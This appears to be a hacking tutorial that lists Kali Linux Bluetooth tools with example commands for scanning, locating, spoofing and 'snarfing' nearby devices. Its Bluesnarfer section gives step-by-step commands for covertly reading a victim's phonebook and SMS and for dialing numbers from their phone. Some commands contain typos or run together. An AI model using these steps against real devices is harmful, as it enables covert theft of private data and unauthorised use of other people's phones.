How to hack bluetooth using kali linux

Wireless Attack
Bluetooth Tools

BLOOOVER

Blooover is performing the Bluebug attack. When you intend to install the application, you should be using a phone that has the Java Bluetooth API implemented.

Features:

Reading phonebooks
Writing phonebook entries
Reading/decoding SMS stored on the device
Setting call forward
Initiating phone call

Bluelog

Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.

Use the below command to see the nearby bluetooth device details in log file named btdevices.log

bluelog -i hci0 -o /root/Desktop/btdevices.log –v

This command provide Additional information including information of manufacturer, broadcast names and device class.

bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log –v


BlueMaho

BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do – testing to find unknown vulns. Also it can form nice statistics.

BlueMaho, an integrated Bluetooth scanning/hacking tool. Here we will simply use it for scanning. You can start BlueMaho's elegant GUI by typing:

bluemaho.py

When you do, it opens a GUI. Here, I have clicked on the "get SDP info" and hit the play button to the left. BlueMaho begins scanning for discoverable devices, and like the other tools, it finds two Bluetooth devices.

In the bottom window, BlueMaho displays more info from the scanned devices. I have copied that info and placed it into a text file to make it easier for you to read.

Note that it displays the name of the first device and then describes the device type as "Audio/Video, Headset profile." Then identify second device and we are told its device type is "Phone, Smart phone."

Now, that we know how to gather information on the Bluetooth devices in our range,

BlueRanger

BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).

Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating. The recision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion.

Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):

root@kali:~# blueranger.sh hci1 20:C9:D0:43:4B:D8Bluesnarfer

Bluesnarfer downloads the phone-book of any mobile device vulnerable to Bluesnarfing. If an mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data

Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):

root@kali:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

Hack Bluetooth Using Bluesnarfer

Check The Configuration

hciconfig hci0

Scan for victims

hcitool scan hci0

Ping the vitcim device to see if device is awake

l2ping < Victim MAC Addr>

Browse the victim for rfcomm channels to connect to

sdptool browse --tree --l2cap < mac addr >

Then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To see available opions to do 

bluebugger -h

Dial number

bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Btscanner

Btscanner tool can capture information from a Bluetooth device without pairing. You can download Btscanner using this LINK
The setup is very small is size (only 1.05 MB) and easy to install. Btscanner search devices and show them on the screen and if you want to see more info just hit enter and it will show devices mac address.

1 Start your bluetooth with that command

Syntax:-service bluetooth satrt

2 Now open the btscanner with this command 

Syntax:- btscanner

Now you are here

3 Now see the instructions which are given below

in my case press i . and your scan is started

4.Now you find the bluetooth device list

5.Now select with the arrow keys and press enter and get full info about the bluetooth.

Redfang

RedFang is a small proof-of-concept application to find non discoverable Bluetooth devices. This is done by brute forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name().

Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):

root@kali:~# fang -r 00803789EE76-00803789EEff -s

Spooftooph

Spooftooph is designed to automate spoofing or cloning Bluetooth device information. Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specifically the same Address).

Well normally most of us never intend to audit the Bluetooth stack in any organization. But this tool could be interesting to use in an environment where Bluetooth devices have been paired with important hardware.

Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):

root@kali:~# spooftooph -i hci1 -a 00803789EE76





For Latest tricks go Click on